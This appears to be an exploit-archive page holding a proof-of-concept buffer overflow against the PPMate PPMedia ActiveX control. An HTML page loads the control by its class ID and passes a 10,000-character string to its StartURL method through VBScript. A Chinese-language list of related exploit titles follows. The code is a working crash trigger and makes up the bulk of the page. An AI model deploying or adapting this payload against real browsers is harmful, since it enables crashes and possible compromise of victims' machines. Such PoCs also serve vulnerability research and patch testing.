<html>
<body> <object id=target
classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object>
<script language=vbscript> arg1=String(10000, "A")
target.StartURL(arg1) </script>
</body>
</html>
【PPMate PPMedia Class ActiveX Control Buffer Overflow PoC】相关文章:
★ Maian Events 2.0 Insecure Cookie Handling Vulnerability
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
★ BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
★ Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)
★ NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
★ Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC
★ phsBlog 0.2 Bypass SQL Injection Filtering Exploit
★ Maian Cart 1.1 Insecure Cookie Handling Vulnerability
★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
★ Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC